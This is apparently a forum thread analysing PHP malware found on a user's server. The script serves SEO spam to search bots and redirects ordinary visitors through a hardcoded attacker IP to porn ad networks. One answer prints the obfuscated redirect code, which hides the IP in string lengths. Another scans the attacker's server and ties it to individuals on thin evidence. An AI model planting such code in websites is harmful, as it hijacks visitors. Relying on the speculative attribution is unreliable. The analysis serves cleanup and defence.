PHP malware on server - but helpless in identifying the malicious code

(I haven't gone over the code, I'm speculating because your description fits the modus of some malware I've seen in the past.)

It's probably a bot that is trying to build a network of backlinks to a known group of web assets.

Basically they find a vulnerable site and pop it. From there the script does a search to find which of the attacker's assets are currently ranking highest (or lowest) and haven't been penalized by Google/et al. yet.

They promote their assets further by implanting top keywords and links to those sites into an HTML document that gets served from your domain. Now when Google indexes your site, they see you are endorsing their sites and they rank even higher in the search results.

It's pretty clever.

It's toxic to you though because when Google penalizes spam farms, they also penalize sites that link to them. Your SEO will probably will take a hit if/when judgment day comes. Remediate this ASAP.


Well, ill give you some more detail:

Note, this is not malware that is trying to break deeper on your system, is a script that makes someone (italian i guess) earn money using your server in 2 ways (at your cost):

  • If is a bot (a search bot) who is doing the request, it will perform a few requests promoting the keyword: "1 euro terno su tutte vincita" and it will print a suffle of words taken from the results. So they are promotting some lotto sites from your server IP.

This are the base urls:

# https://www.google.com/search?q=1 euro terno su tutte vincita&num=100&newwindow=1&source=lnt&tbs=qdr:d&sa=X
# http://search.yahoo.com/search?p=1 euro terno su tutte vincita
# http://www.ask.com/web?q=1 euro terno su tutte vincita&qsrc=11&adt=1&o=0&l=dir&page=$page
  • If is not a bot, if is a good user agent, the script will redirect the user browser to another compromised server, but this time to a porn ad network.

Thers a hidden IP in the script (in the dots):

  • IP: 37.1.211.206
  • COUNTRY: US (USA)


$adr1 = ".....................................";
$adr2 = ".";
$adr3 = "...................................................................................................................................................................................................................";
$adr4 = "..............................................................................................................................................................................................................";
// get it from the lenght of the strings, not the best way to hidde something ^^
$ard = strlen($adr1) . "." . strlen($adr2) . "." . strlen($adr3) . "." . strlen($adr4);
// echo $ard;

And the other part is just joining the strings and doing this request: http://37.1.211.206/input/?mark=20160624-(SERVER_NAME)

if (!@$isbot) {
    $s = dirname($_SERVER['PHP_SELF']);
    if ($s == '\\' | $s == '/') {
        $s = ('');
    }
    $s = $_SERVER['SERVER_NAME'] . $s;
    header("Location: http://$ard/input/?mark=20160624-$s");
    exit;
}

At the end the server at 37.1.211.206 will save your servers ID and redirect you to a random porn ad server.


Use the IP address to serve justice on this script kiddy.

A traceroute to his IP from here (local hops removed):

  3    17 ms    17 ms    17 ms  be4066.ccr22.yyz02.atlas.cogentco.com [38.122.69.117]
  4    23 ms    24 ms    23 ms  be2994.ccr22.cle04.atlas.cogentco.com [154.54.31.233]
  5    31 ms    30 ms    31 ms  be2718.ccr42.ord01.atlas.cogentco.com [154.54.7.129]
  6    32 ms    31 ms    31 ms  be2248.ccr22.ord03.atlas.cogentco.com [154.54.5.158]
  7    32 ms    32 ms    32 ms  be2617.rcr12.b002281-5.ord03.atlas.cogentco.com [154.54.40.94]
  8    31 ms    37 ms    31 ms  38.122.181.114
  9    31 ms    33 ms    31 ms  37.1.209.2
 10    32 ms    32 ms    31 ms  37.1.211.206

Reverse DNS lookup on the last 3 hosts reveal nothing further directly, except if you check the whole subnets:

38.122.181.113  te0-0-0-2.rcr12.b002281-5.ord03.atlas.cogentco.com

The subnet appears to be customer endpoints for the Cogent Communications ISP. If we quick port scan the attacker's server, we see only 22/ssh and 80/http open. That strongly suggests a linux box, or a router. The webpage on the server appears to be the fresh install page for apache. Going to the script in the code first redirects to the domain hstraffa.com, and then to a third party porn site. A quick rake of hstraffa.com social presence reveals only 2 google+ likes. Here is one (WARNING: minimal but present graphic content) https://plus.google.com/105307781761317547299 and another: https://plus.google.com/115324666314038607739 . They appear to be Indian names, and a human being appears to be behind it all. A not very skilled script kiddie trying to monetize porn ads.

I would just take all of this, with your own investigation results (php scripts and server logs related to the incident, and contact the security officer at Cogent Communications. Let them take care of it.

You do however need to clean your own side, and I would recommend a fresh server install if you cannot figure out how they got in. Next intrusion might not be so benign...

Tags:

Php

Server

Malware

Recent Posts